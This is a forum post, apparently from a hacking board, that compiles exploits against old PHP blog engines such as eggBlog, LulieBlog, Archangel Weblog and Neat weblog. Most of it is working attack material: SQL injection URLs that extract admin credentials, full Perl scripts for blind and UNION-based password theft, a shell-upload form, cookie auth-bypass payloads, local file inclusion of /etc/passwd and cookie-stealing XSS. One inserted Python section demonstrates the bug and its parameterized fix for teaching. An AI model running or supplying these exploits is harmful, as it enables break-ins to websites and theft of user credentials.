The section is called "CMS engines and blogs", but apart from WordPress I haven't seen any blog write-ups here, so let's fix that)))

FlashBlog beta0.31 Remote File Upload
Upload the shell here:
View it here:

FlashBlog SQL Injection
Code:
http://[host]/[path]//php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17/**/from/**/usuarios/*

Archangel Weblog 0.90.02 Admin Auth Bypass, Upload File, Blind SQL Injection
PHP:
#!/usr/bin/perl -w
# Portal : Archangel Weblog 0.90.02
# Download : http://www.archangelmgt.com/Archangel_Weblog_v090_02.zip
# exploit aported password crypted
# mgharba :d:d:d:d
########################################
#[*] Founded & Exploited by : Stack-Terrorist [v40]
#[*] Contact: Ev!L =>> see down
#[*] Greetz : Houssamix & Djekmani & Jadi & iuoisn & Str0ke & All muslims HaCkeRs :)
########################################
# * TITLE: PerlSploit Class
# * REQUIREMENTS: PHP 4 / PHP 5
# * VERSION: v.1
# * LICENSE: GNU General Public License
# * ORIGINAL URL: http://www.v4-Team/v4.txt
# * FILENAME: PerlSploitClass.pl
# *
# * CONTACT: [email protected] (french / english / arabic / moroco Darija :d )
# * THNX : AllaH
# * GREETZ: Houssamix & Djekmani
########################################
system("color a");
print "\t\t############################################################\n\n";
print "\t\t#   Archangel Weblog <= 0.90.02 - Remote SQL Inj Exploit   #\n\n";
print "\t\t#                by Stack-Terrorist [v40]                  #\n\n";
print "\t\t############################################################\n\n";
########################################
use LWP::UserAgent;
use HTTP::Request;
die "Example: perl $0 http://victim.com/path/\n" unless @ARGV;
system("color f");
########################################
# column and table holding the admin credentials
$user = "author_login";      # the username column of the authors table
$pass = "author_password";   # the password (md5) column of the authors table
$tab  = "authors";           # the table itself
########################################
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
########################################
# UNION into post_id; CHAR(60,117,115,101,114,62) is the string '<user>', used as a marker
# so the login can be cut out of the page with a regex
$host = $ARGV[0] . "/index.php?post_id=-1'/**/union/**/select/**/12,concat(CHAR(60,117,115,101,114,62),".$user.",CHAR(60,117,115,101,114,62),".$pass."),32,4,5,6,3/**/from/**/".$tab."/**/where/**/author_id=1/*";
$res = $b->request(HTTP::Request->new(GET => $host));
$answer = $res->content;
########################################
if ($answer =~ /<user>(.*?)<user>/) {
    print "\nBrought to you by v4-team.com...\n";
    print "\n[+] Admin User : $1";
}
########################################
# the hash is the first 32-hex-digit run in the page, right after the second marker
if ($answer =~ /([0-9a-fA-F]{32})/) {
    print "\n[+] Admin Hash : $1\n\n";
    print "\t\t# Exploit has ben aported user and password hash #\n\n";
} else {
    print "\n[-] Exploit Failed...\n";
}
########################################
#-------------------Exploit exploited by Stack-Terrorist --------------------#
########################################

miniBloggie 1.0 Delete Post
PHP:
if (isset($_GET['post_id'])) $post_id = $_GET['post_id'];
if (isset($_GET['confirm'])) $confirm = $_GET['confirm'];
[...]
elseif ($confirm == "yes") {
    [...]
    $sql = "DELETE FROM blogdata WHERE post_id=$post_id";
    $query = mysql_query($sql) or die("Cannot query the database.<br>" . mysql_error());
Vulner:
Example:

Smartblog SQL Injection
Code:
http://localhost/[script_path]/index.php?idt=-1 UNION SELECT 1,concat_ws(0x3a,pseudo,pass),3,4,5,6,7,8,9 FROM smb_user--

BlogMe PHP SQL Injection
Code:
http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,3,4,5,6,aes_decrypt(aes_encrypt(user(),0x71),0x71)--

BlogWorx 1.0 SQL Injection
Code:
http://www.example.com/lab/blogworx1.0/view.asp?id=1+union+select+0,1,2,Password,UserName,5,6+from+Users

Blog PixelMotion SQL Injection
Code:
http://www.xxx.org/blog/index.php?categorie=-1+union+select+0,1,2,database(),4,5,6/*

Blog PixelMotion File Upload
Upload the shell here:
Fetch it here:

Blog PixelMotion Database Backup
The members table is called blog_utilisateurs

LulieBlog 1.2 Admin Auth Bypass, Upload File, Blind SQL Injection
PHP:
# LulieBlog 1.2 Multiple Remote Vulnerabilities (Admin Auth Bypass, Upload File, Blind SQL Injection)
# Author: Cod3rZ
# Site: http://cod3rz.helloweb.eu
# Site: http://devilsnight.altervista.org
# Date: 06/05/2008 [dd/mm/yyyy]
#
# Admin Auth Bypass:
# Modify Articles: send a request to site/Admin/article_modif2.php with:
#   titre=[titlearticle]&text=[text]&media=[media]&id=[idarticle]
# New Article: send a request to site/Admin/article_suppr.php with:
#   titre=[titlearticle]&text=[text]&media=[media]
# Change Admin Username & Blog Title: send a request to site/Admin/util_modif.php with:
#   pseudo=[newadminnick]&titre=[newblogtitle]
# Change Admin Email: send a request to site/Admin/mails_modif.php with:
#   recevmail=1&emetteur=[email]&desti=[email]
# PS: All administration variables are vulnerable!
# Upload File (Simple Exploit):
<html>
<head><title>LulieBlog Uploader - http://cod3rz.helloweb.eu</title></head>
<body bgcolor='#000000' text='#FFFFFF'>
<form name='cod3rz' action='site/Admin/media_insert.php' method='post' enctype='multipart/form-data'>
<font size='1' face='Verdana'>
<center>
Title:<br>
<input type='text' name='titre'><br>
File:<br>
<input type='file' name='fichier'><br>
<input type='hidden' name='lieu' value='0'>
Type File:<br>
<select name='typemedia'>
<option value='1'>Image</option>
<option value='2'>Flash</option>
<option value='3'>Archive</option>
<option value='4'>Vid</option>
<option value='6'>Présentation PowerPoint</option>
<option value='7'>Fichiers PDF</option>
</select><br>
<input type='submit' name='upload' value='Upload'>
</font></center>
</form></body></html>
# End

# Blind SQL Injection Exploit:
#!/usr/bin/perl
# LulieBlog 1.2 Remote Blind SQL Injection Exploit
# Author : Cod3rZ
# Site : http://cod3rz.helloweb.eu
# Site : http://devilsnight.altervista.org
# Usage : perl lb.pl site
use LWP::UserAgent;
use HTTP::Request::Common;
use Time::HiRes;

$ua = LWP::UserAgent->new;
# target taken from the command line (the original had a hard-coded http://127.0.0.1/blog here,
# which made the usage check below unreachable)
$site = $ARGV[0];
if (!$site) { &usage; exit; }

# charset is hex digits only: the value being read is an md5 hash
@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);

sub usage {
    print " Usage: perl ig.pl site \n";
    print " Ex.:   perl ig.pl http://127.0.0.1 \n";
}

# one request, returns the elapsed time: benchmark() in the injected IF() makes a hit slow
sub request {
    $var = $_[0];
    $start = Time::HiRes::time();
    $response = $ua->request(GET $var, s => $var);
    $response->is_success() || print("$!\n");
    $end = Time::HiRes::time();
    $time = $end - $start;
    return $time;
}

sub refresh {
    system("cls");
    print " -------------------------------------------------\n";
    print " LulieBlog 1.2 Remote Blind Sql Injection Exploit \n";
    print " Powered by Cod3rZ                                \n";
    print " http://cod3rz.helloweb.eu                        \n";
    print " -------------------------------------------------\n";
    print " Please Wait..                                    \n";
    print " Hash : " . $_[3] . " \n";
    print " -------------------------------------------------\n";
}

# 32 positions of the hash, 16 candidates each; the 'pass' row of lulieblog_parametres holds it
for ($i = 1; $i < 33; $i++) {
    for ($j = 0; $j < 16; $j++) {
        $var = $site."/visumedia.php?id=-1' OR (SELECT IF((ASCII(SUBSTRING(`valeur_parametre`,".$i.",1))=".$array[$j]."),benchmark(200000000,CHAR(0)),0) FROM lulieblog_parametres WHERE nom_parametre='pass')/*";
        # system('pause');   # debug leftover in the original: would stop after every single request
        $time = request($var);
        refresh($host, $timedefault, $j, $hash, $time, $i);
        if ($time > 4) {
            # repeat once to confirm the delay was the benchmark and not network jitter
            $time = request($var);
            refresh($host, $timedefault, $j, $hash, $time, $i);
            $hash .= chr($array[$j]);
            refresh($host, $timedefault, $j, $hash, $time, $i);
            $j = 200;   # leave the inner loop
        }
    }
    if ($i == 1 && !$hash) {
        print " Failed \n";
        print " -------------------------------------------------\n";
        die();
    }
    if ($i == 32) {
        print " Exploit Terminated \n";
        print " -------------------------------------------------\n ";
        system('pause');
    }
}
# http://cod3rz.helloweb.eu

Battle Blog <= 1.25 SQL Injection
For MS SQL Server:
For MS Access:

Blogator-script 0.95 Change User Password
Vulnerable code:
PHP:
line 23: $id=$_GET['a'];
line 24: $email=$_GET['b'];
line 25: $mdp=$_GET['c'];
.....
line 27: $sql_change_pass=mysql_query("UPDATE membre SET pass = '$mdp' WHERE id_membre = '$id' AND email LIKE '$email' LIMIT 1");
Code:
http://www.site.com/_blogadata/include/init_pass2.php?c=[newpass]&a=[user id]&b=%

Blogator-script 0.95 SQL Injection
Vulnerable code:
PHP:
line 27: $id_art=$_GET['id_art'];
......
line 34: $sql_res=mysql_query("SELECT sond_rep, votes_H, votes_F FROM sondage_rep WHERE id_sond = $id_art ORDER BY ordre");
Code:
http://www.site.com/_blogadata/include/sond_result.php?id_art=-99999/**/union/**/select/**/concat(pseudo,0x3a,pass,char(58),email),2,3/**/from/**/membre/**/where/**/id_membre=1/*

Blogator-script 0.95 File Inclusion

eggBlog 4.0 SQL Injection
PHP:
# Author: __GiReX__
# mySite: girex.altervista.org
# Date: 27/03/2008 - 1/04/2008 Added exploit for str0ke
# CMS: eggBlog 4.0
# Site: eggblog.net
# Bug: SQL Injection (cookie vars)
# Type: 1 - Admin/User Authentication Bypass
# Bug2: Blind SQL Injection (same vars-query)
# Type: Password retrieve exploit
# Var : $_COOKIE['email], $_COOKIE['password']
# Need: magic_quotes_gpc = Off

# File: index.php
require_once "_lib/global.php";
...
eb_pre();

# File: /_lib/globals.php
require_once '_lib/user.php';
...
function eb_pre()
{
    ...
    if(isset($_COOKIE['email']) && isset($_COOKIE['password']) && !isset($_SESSION['user_id']))
        eb_login($_COOKIE['email'],$_COOKIE['password'],1);

# Let we see function eb_login
# File: /_lib/user.php
function eb_login($email,$password,$key)
{
    ...
    if($key==0) $password=md5($password);
    # Our $key is set to 1 so the password will not be crypted
    $sql="SELECT user_id FROM eb_users WHERE user_email=\"".$email."\" AND md5(user_password)=\"".$password."\"";
    $query=mysql_query($sql);
    # I have no words, 2 vars not sanitized into a SELECT query

PoC 1:
GET [PATH]/index.php HTTP/1.1
Host: [HOST]
...
Cookie: email=@" OR "1; password=@" OR "1
# With this you will be authenticated with the first record of table eb_user

PoC 2:
GET [PATH]/index.php HTTP/1.1
Host: [HOST]
...
Cookie: email=@" OR "1; password=@" OR "1" AND user_id="[VICTIM_USER_ID]
# For anybody you want

##############################################################################################################
# Start Blind SQL Injection / Password retrieve exploit
#
# NOTE: Password is in plain-text so take a coffee...
#
##############################################################################################################
#!/usr/bin/perl -w
# EggBlog v4.0 Blind SQL Injection
# Password Retrieve Exploit
# Coded by __GiReX__
use LWP::UserAgent;
use HTTP::Request;

if (not defined $ARGV[0]) {
    print "usage: perl $0 [host] [path]\n";
    print "example: perl $0 localhost /eggblog/\n";
    exit;
}

my $client = new LWP::UserAgent;
# full printable ASCII because the stored password is plaintext, plus 0:
# ASCII(SUBSTRING(...)) past the end of the string is 0, which terminates the loop
my @cset = (32..126, 0);
my ($i, $j, $hash) = (0, 1, undef);
my $host = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0] : 'http://' . $ARGV[0];
$host .= $ARGV[1] unless not defined $ARGV[1];

banner();
check_vuln($host) or die "[-] Site not vulnerable\n";

# outer loop ends only when the terminator (last element of @cset) matches
while ($i != $#cset) {
    for ($i = 0; $i <= $#cset; $i++) {
        my ($pre_time, $post_time) = time();
        $rv = check_char($host, $cset[$i], $j);
        $post_time = time();
        info(chr($cset[$i]), $post_time - $pre_time, $hash);
        # a hit is a request that took longer than 3 s (the benchmark() branch ran)
        if ($post_time - $pre_time > 3 and $rv) {
            $hash .= chr($cset[$i]);
            last;
        }
    }
    $j++;
}

# parentheses added: '.' binds tighter than '?:' in Perl, so the original always printed the success branch
print "\n" . ((defined $hash) ? "[+] Admin password: ${hash} \n" : "[-] Exploit mistake: please check benchmark and charset\n");
print "[+] Exploit terminated\n\n";

sub banner {
    print "\n";
    print "[+] EggBlog v4.0 Blind SQL Injection\n";
    print "[+] Password Retrieve Exploit\n";
    print "[+] Coded by __GiReX__\n";
    print "\n";
}

# a broken query in the cookie must produce a PHP warning in the page
sub check_vuln {
    my ($target, $res) = @_;
    $get = new HTTP::Request(GET, $target);
    $get->header('Cookie' => 'email=-1" WHERE X#; password=aaaaaaa;');
    $res = $client->request($get);
    if ($res->is_success) {
        return 1 if $res->content =~ /<b>Warning<\/b>:/;
    }
    return 0;
}

# time-based check of one character: benchmark() only runs when the guess is right
sub check_char {
    my ($target, $char, $n, $res) = @_;
    $get->header(Cookie => 'email=-1"+AND+'.
                           'CASE+WHEN'.
                           '((SELECT(ASCII(SUBSTRING(user_password,'.$n.',1)))FROM+eb_users+WHERE+user_id=1)='.$char.')'.
                           'THEN+benchmark(90000000,CHAR(0))+'.
                           'END#; '.
                           'password=dummy_psw');
    $res = $client->request($get);
    return $res->is_success;
}

sub info {
    my ($char, $delay, $hash) = @_;
    print STDOUT "[+] Admin password: ${hash}".$char."\r" unless not defined $hash;
    # print STDOUT "[+] Char: ${char} - Delay: ${delay}\r";
    $| = 1;
}
# milw0rm.com [2008-04-01]

P.S. I'll keep adding vulnerabilities bit by bit....
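Added example, my own code and not from any of the engines or exploits above: every PoC in this post comes down to one bug, a request value glued straight into an SQL string. The snippet below reproduces that bug against a constructed in-memory SQLite database (the table and column names blogdata, users, uname, upass and the two rows are assumptions for the demo, not any real engine's schema), runs the three payload shapes used above (UNION SELECT to pull login:hash the way the FlashBlog/Smartblog/Archangel PoCs do, `1 OR 1=1` against a miniBloggie-style DELETE, and the eggBlog-style `' OR '1` cookie bypass with the AND/OR precedence trick from PoC 2), and shows the same calls against a version that casts or binds the parameter. It also probes the UNION column count the way you have to blind, which is why the PoCs pad with 1,2,3,...,17. SQLite differences from the MySQL targets: `||` instead of `concat()`/`0x3a`, single-quoted literals where eggBlog uses double quotes, and a case-sensitive `=`.

```python
import sqlite3

# Constructed demo schema standing in for the blog tables named in the PoCs.
# Table/column names are assumptions for this demo, not any real engine's schema;
# the hashes are md5("password") and md5("").
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE blogdata(post_id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO blogdata VALUES (1,'first'),(2,'second'),(3,'third');
        CREATE TABLE users(id INTEGER PRIMARY KEY, uname TEXT, upass TEXT);
        INSERT INTO users VALUES (1,'admin','5f4dcc3b5aa765d61d8327deb882cf99'),
                                 (2,'editor','d41d8cd98f00b204e9800998ecf8427e');
    """)
    return db

# --- the bug every PoC in this post abuses: a raw request value glued into SQL ---

def view_post_vulnerable(db, post_id):
    # same shape as "SELECT ... WHERE id=$id": numeric context, no quote to break out of
    sql = f"SELECT post_id, title FROM blogdata WHERE post_id={post_id}"
    return db.execute(sql).fetchall()

def delete_post_vulnerable(db, post_id):
    # miniBloggie: DELETE FROM blogdata WHERE post_id=$post_id ; returns rows left
    db.execute(f"DELETE FROM blogdata WHERE post_id={post_id}")
    return db.execute("SELECT count(*) FROM blogdata").fetchone()[0]

def login_vulnerable(db, email, pw_hash):
    # eggBlog 4.0 shape: two unescaped strings in one SELECT. AND binds tighter than
    # OR, so  uname='' OR '1' AND upass='' OR '1'  is true for every row and the
    # first row wins; tack  AND id='2'  onto the last OR to pick a specific user.
    sql = f"SELECT id FROM users WHERE uname='{email}' AND upass='{pw_hash}'"
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def find_column_count(db, max_cols=20):
    # A UNION needs the same width on both sides; widen a NULL list until the
    # "different number of result columns" error disappears.
    for n in range(1, max_cols + 1):
        try:
            view_post_vulnerable(db, "-1 UNION SELECT " + ",".join(["NULL"] * n))
            return n
        except sqlite3.OperationalError:
            continue
    return None

# --- hardened forms: cast to the expected type, bind everything else ---

def _as_int(value):
    try:
        return int(value)
    except (TypeError, ValueError):
        return None

def view_post_fixed(db, post_id):
    pid = _as_int(post_id)
    if pid is None:
        return []
    return db.execute("SELECT post_id, title FROM blogdata WHERE post_id=?", (pid,)).fetchall()

def delete_post_fixed(db, post_id):
    pid = _as_int(post_id)
    if pid is not None:
        db.execute("DELETE FROM blogdata WHERE post_id=?", (pid,))
    return db.execute("SELECT count(*) FROM blogdata").fetchone()[0]

def login_fixed(db, email, pw_hash):
    row = db.execute("SELECT id FROM users WHERE uname=? AND upass=?",
                     (email, pw_hash)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    union = "-1 UNION SELECT id, uname||':'||upass FROM users WHERE id=1"
    print("columns:", find_column_count(db))
    print("vulnerable:", view_post_vulnerable(db, union))
    print("fixed:     ", view_post_fixed(db, union))
    print("bypass as first user:", login_vulnerable(db, "' OR '1", "' OR '1"))
    print("bypass as user 2:    ", login_vulnerable(db, "' OR '1", "' OR '1' AND id='2"))
    print("posts left after fixed delete:     ", delete_post_fixed(db, "1 OR 1=1"))
    print("posts left after vulnerable delete:", delete_post_vulnerable(db, "1 OR 1=1"))
```

The fixed versions do not try to strip quotes or comment markers; casting the id and binding the strings is the whole fix, which is why the same payloads come back empty against them.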
Neat weblog 0.2 SQL Injection
PHP:
#!/usr/bin/perl
#####################################################################################
####                          Neat weblog 0.2                                    ####
####                       SQL Injection Exploit                                 ####
#####################################################################################
# Discovered by : IRCRASH (Dr.Crash)
# Exploited By : Dr.Crash
# IRCRASH Team Members : Dr.Crash - Malc0de - R3d.w0rm
#####################################################################################
# Script Download : http://kent.dl.sourceforge.net/sourceforge/neat-web/neat0.2.zip
#####################################################################################
# < SQL >
# SQL Address : http://Sitename/index.php?action=show&articleId=99999%27union/**/select/**/0,concat(user,0x120,password),2,3,4,5,6,7,8/**/from/**/neat_users/**/where+id=1/*
#####################################################################################
# Our site : Http://IRCRASH.COM
#####################################################################################
use LWP;
use HTTP::Request;
use Getopt::Long;

sub header {
    print "
****************************************************
*       Neat weblog 0.2 Sql Injection exploit      *
****************************************************
* AUTHOR        : IRCRASH                          *
* Discovered by : IRCRASH (Dr.Crash)               *
* Our Site      : IRCRASH.COM                      *
****************************************************";
}

sub usage {
    print "
* Usage : perl $0 -url http://Sitename/
****************************************************
";
}

my %parameter = ();
GetOptions(\%parameter, "url=s");
$url = $parameter{"url"};
if (!$url) { header(); usage(); exit; }
if ($url !~ /\//)      { $url = $url."/"; }
if ($url !~ /http:\/\//) { $url = "http://".$url; }

# the hex strings are markers: 0x4c6f67696e3a = "Login:", 0x3c656e64757365723e = "<enduser>",
# 0x0d0a50617373776f72643a = "\r\nPassword:", 0x3c656e64706173733e = "<endpass>"
$vul = "/index.php?action=show&articleId=99999%27union/**/select/**/0,concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),2,3,4,5,6,7,8/**/from/**/neat_users/**/where+id=1/*";

sub Exploit() {
    $requestpage = $url.$vul;
    print "Requesting Page is ".$url."\n";
    my $req = HTTP::Request->new("POST", $requestpage);
    $ua = LWP::UserAgent->new;
    $ua->agent('Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9');
    $req->referer($url);
    $req->referer("http://IRCRASH.COM");
    $req->content_type('application/x-www-form-urlencoded');
    $req->header("content-length" => $contlen);
    $req->content($poststring);
    $response = $ua->request($req);
    $content = $response->content;
    $header = $response->headers_as_string();
    # Debug Modus: delete # at beginning of next line
    #print $content;
    # cut the login and password out between the markers
    @name = split(/Login:/, $content);
    $name = $name[1];
    @name = split(/<enduser>/, $name);
    $name = $name[0];
    @password = split(/Password:/, $content);
    $password = $password[1];
    @password = split(/<endpass>/, $password);
    $password = $password[0];
    if (!$name && !$password) {
        print "\n\n";
        print "!Exploit failed ! :(\n\n";
        exit;
    }
    print "Username: ".$name."\n";
    print "Password: ".$password."\n\n";
    print "Crack Password And Login In : $url/index.php?action=login\n";
    print "Enjoy My friend .....\n";
}

# Starting
header();
print "\n\nExploiting...\n";
Exploit();
# milw0rm.com [2008-03-31]

Lightblog 9.6 local file inclusion
Code:
http://localhost/LightBlog9.6/view_member.php?username=../../../../../../../../../../etc/passwd%00

Artmedic weblog local file inclusion

A-Blog V.2 (id) XSS / SQL Injection
PHP:
#!/usr/bin/perl
#####################################################################################
####                              A-Blog V.2                                     ####
####       Multiple Remote Vulnerabilities (SQL Injection Exploit/XSS)           ####
#####################################################################################
# AUTHOR : IRCRASH
# Discovered by : Dr.Crash
# Exploited By : Dr.Crash
# IRCRASH Team Members : Dr.Crash - Malc0de - R3d.w0rm
#####################################################################################
# Script Download : http://heanet.dl.sourceforge.net/sourceforge/a-blog/A-BlogV2.rar
#####################################################################################
# < XSS >
# XSS Address : http://Sitename/search.php?words=<script>alert(document.cookie);</script>&submit=Go
#####################################################################################
# < SQL >
# SQL Address : http://Sitename/blog.php?view=news&id=9999%27union/**/select/**/CoNcAt(0x4c6f67696e3a,name,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)/**/from/**/site_administrators/*
# Help : See Username And Password In Site Title
#####################################################################################
# Our site : Http://IRCRASH.COM
#####################################################################################
use LWP;
use HTTP::Request;
use Getopt::Long;

sub header {
    print "
****************************************************
*        A-Blog V.2 Sql Injection exploit          *
****************************************************
* AUTHOR        : IRCRASH                          *
* Discovered by : Dr.Crash                         *
* Exploited by  : Dr.Crash                         *
* Our Site      : IRCRASH.COM                      *
****************************************************";
}

sub usage {
    print "
* Usage : perl $0 -url http://Sitename/
****************************************************
";
}

my %parameter = ();
GetOptions(\%parameter, "url=s");
$url = $parameter{"url"};
if (!$url) { header(); usage(); exit; }
if ($url !~ /\//)      { $url = $url."/"; }
if ($url !~ /http:\/\//) { $url = "http://".$url; }

# single-column UNION: the result lands in the page title, marked "Login:...<enduser>\r\nPassword:...<endpass>"
$vul = "blog.php?view=news&id=9999%27union/**/select/**/CoNcAt(0x4c6f67696e3a,name,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)/**/from/**/site_administrators/*";

sub Exploit() {
    $requestpage = $url.$vul;
    print "Requesting Page is ".$url."\n";
    my $req = HTTP::Request->new("POST", $requestpage);
    $ua = LWP::UserAgent->new;
    $ua->agent('Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9');
    $req->referer($url);
    $req->referer("http://IRCRASH.COM");
    $req->content_type('application/x-www-form-urlencoded');
    $req->header("content-length" => $contlen);
    $req->content($poststring);
    $response = $ua->request($req);
    $content = $response->content;
    $header = $response->headers_as_string();
    # Debug Modus: delete # at beginning of next line
    #print $content;
    @name = split(/Login:/, $content);
    $name = $name[1];
    @name = split(/<enduser>/, $name);
    $name = $name[0];
    @password = split(/Password:/, $content);
    $password = $password[1];
    @password = split(/<endpass>/, $password);
    $password = $password[0];
    if (!$name && !$password) {
        print "\n\n";
        print "!Exploit failed ! :(\n\n";
        exit;
    }
    print "Username: ".$name."\n";
    print "Password: ".$password."\n\n";
    print "Crack Password And Login In : $url/admin.php\n";
    print "Enjoy My friend .....\n";
}

# Starting
header();
print "\n\nExploiting...\n";
Exploit();
# milw0rm.com [2008-02-03]

BlogPHP v.2 (id) XSS / SQL Injection
PHP:
#!/usr/bin/perl
#####################################################################################
####                              BlogPHP V.2                                    ####
####       Multiple Remote Vulnerabilities (SQL Injection Exploit/XSS)           ####
#####################################################################################
# AUTHOR : IRCRASH
# Discovered by : Dr.Crash
# Exploited By : Dr.Crash
# IRCRASH Team Members : Dr.Crash - Malc0de - R3d.w0rm
#####################################################################################
# Script Download : http://puzzle.dl.sourceforge.net/sourceforge/blogphpscript/BlogPHPv2.zip
#####################################################################################
# < XSS >
# XSS Address : http://Sitename/index.php?search=<script>alert(document.cookie);</script>
#####################################################################################
# < SQL >
# SQL Address : http://Sitename/index.php?act=page&id=999999999%27union/**/select/**/0,1,CoNcAt(0x4c6f67696e3a,username,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),3,4/**/from/**/blogphp_users/*
#####################################################################################
# Our site : Http://IRCRASH.COM
#####################################################################################
use LWP;
use HTTP::Request;
use Getopt::Long;

sub header {
    print "
****************************************************
*        SBlogPHP v.2 Sql Injection exploit        *
****************************************************
* AUTHOR        : IRCRASH                          *
* Discovered by : Dr.Crash                         *
* Exploited by  : Dr.Crash                         *
* Our Site      : IRCRASH.COM                      *
****************************************************";
}

sub usage {
    print "
* Usage : perl $0 -url http://Sitename/
****************************************************
";
}

my %parameter = ();
GetOptions(\%parameter, "url=s");
$url = $parameter{"url"};
if (!$url) { header(); usage(); exit; }
if ($url !~ /\//)      { $url = $url."/"; }
if ($url !~ /http:\/\//) { $url = "http://".$url; }

$vul = "/index.php?act=page&id=999999999%27union/**/select/**/0,1,CoNcAt(0x4c6f67696e3a,username,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),3,4/**/from/**/blogphp_users/*";

sub Exploit() {
    $requestpage = $url.$vul;
    print "Requesting Page is ".$url."\n";
    my $req = HTTP::Request->new("POST", $requestpage);
    $ua = LWP::UserAgent->new;
    $ua->agent('Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9');
    #$req->referer($url);
    $req->referer("http://IRCRASH.COM");
    $req->content_type('application/x-www-form-urlencoded');
    $req->header("content-length" => $contlen);
    $req->content($poststring);
    $response = $ua->request($req);
    $content = $response->content;
    $header = $response->headers_as_string();
    # Debug Modus: delete # at beginning of next line
    #print $content;
    @name = split(/Login:/, $content);
    $name = $name[1];
    @name = split(/<enduser>/, $name);
    $name = $name[0];
    @password = split(/Password:/, $content);
    $password = $password[1];
    @password = split(/<endpass>/, $password);
    $password = $password[0];
    if (!$name && !$password) {
        print "\n\n";
        print "!Exploit failed ! :(\n\n";
        exit;
    }
    print "Username: ".$name."\n";
    print "Password: ".$password."\n\n";
    print "Crack Md5 Password And Login In : $url/login.html\n";
    print "Enjoy My friend .....\n";
}

# Starting
header();
print "\n\nExploiting...\n";
Exploit();
# milw0rm.com [2008-02-02]

LightBlog 9.5 File Upload
Upload the shell:
View it:

LulieBlog Version 1.02 Sql Injection
Code:
http://Sitename/voircom.php?id=-1%27union/**/select/**/0,concat(nom_parametre,0x3a,0x3a,valeur_parametre),2,3,4,5/**/from/**/lulieblog_parametres/*

Mooseguy Blog System 1.0 SQL Injection
Vulnerable code:
PHP:
<?php
$month = $_GET['month'];
$result = mysql_query("SELECT * FROM blog WHERE posted='$month' ORDER BY id DESC") or die("HELP QUERY BROKEN");
...
Code:
http://[target]/[path]/blog.php?month='+union+select+1,2,3,4,5,concat_ws(0x3a,id,uname,upass),7,8+from+users/*

Blogcms 4.2.1b (SQL/XSS)
Code:
http://[server]/[installdir]/index.php?query=asd&blogid=1,1)+union+select+1,2,user(),database(),mname,6,7,8,9,10,11,mpassword,13,14,15+from+nucleus_member/*
Eggblog <= 3.1.0 Cookies SQL Injection
PHP:
#!/usr/bin/perl
use Tk;
use Tk::BrowseEntry;
use Tk::DialogBox;
use LWP::UserAgent;

$mw = new MainWindow(title => "UnderWHAT?!");
$mw->geometry('420x343');
$mw->resizable(0, 0);
$mw->Label(-text => '', -font => '{Verdana} 8', -foreground => 'red')->pack();
$mw->Label(-text => 'eggblog <= 3.1.0 Cookies Sql Injection', -font => '{Tahoma} 7 bold', -foreground => 'red')->pack();
$mw->Label(-text => 'it will take about half an hour to get hashed password', -font => '{Tahoma} 7 bold', -foreground => 'red')->pack();
$mw->Label(-text => 'you need magic_quotes_gpc turned off and mysql version higher than 4.1', -font => '{Tahoma} 7 bold', -foreground => 'red')->pack();
$mw->Label(-text => '', -font => '{Tahoma} 7 bold', -foreground => 'red')->pack();
$fleft  = $mw->Frame()->pack(-side => 'left', -anchor => 'ne');
$fright = $mw->Frame()->pack(-side => 'left', -anchor => 'nw');

# defaults shown in the form fields
$url       = 'http://test2.ru/eggblog/home/index.php';
$user_id   = '1';
$prefix    = 'eggblog_';
$table     = 'users';
$column    = 'user_password';
$report    = '';
$group     = 1;
$curr_user = 0;

$fleft->Label(-text => 'Path to forum index: ', -font => '{Verdana} 8 bold')->pack(-side => "top", -anchor => 'e');
$fright->Entry(-relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$url)->pack(-side => "top", -anchor => 'w');
$fleft->Label(-text => 'User ID: ', -font => '{Verdana} 8 bold')->pack(-side => "top", -anchor => 'e');
$fright->Entry(-relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$user_id)->pack(-side => "top", -anchor => 'w');
$fleft->Label(-text => 'Database tables prefix: ', -font => '{Verdana} 8 bold')->pack(-side => "top", -anchor => 'e');
$fright->Entry(-relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$prefix)->pack(-side => "top", -anchor => 'w');
$fleft->Label(-text => 'Returned hash: ', -font => '{Verdana} 8 bold')->pack(-side => "top", -anchor => 'e');
$fright->Entry(-relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$report)->pack(-side => "top", -anchor => 'w');
$fright->Label(-text => ' ')->pack();
$fright->Button(-text => 'Test blog vulnerability', -relief => "groove", -width => '30', -font => '{Verdana} 8 bold', -activeforeground => 'red', -command => \&test_vuln)->pack();
$fright->Button(-text => 'Get hash from database', -relief => "groove", -width => '30', -font => '{Verdana} 8 bold', -activeforeground => 'red', -command => \&get_hash)->pack();
$mw->Label(-text => '', -font => '{Verdana} 7 bold', -foreground => 'red')->pack();
$fleft->Label(-text => '!', -font => '{Webdings} 22')->pack();
$fleft->Label(-text => 'eggblog 3.1.0', -font => '{Verdana} 7 bold', -foreground => 'red')->pack();
$fleft->Label(-text => 'cookie sql injection ', -font => '{Verdana} 7 bold', -foreground => 'red')->pack();
$fleft->Label(-text => 'mysql char bruteforcing ', -font => '{Verdana} 7 bold', -foreground => 'red')->pack();
$fleft->Label(-text => 'bug in auth function ', -font => '{Verdana} 7 bold', -foreground => 'red')->pack();
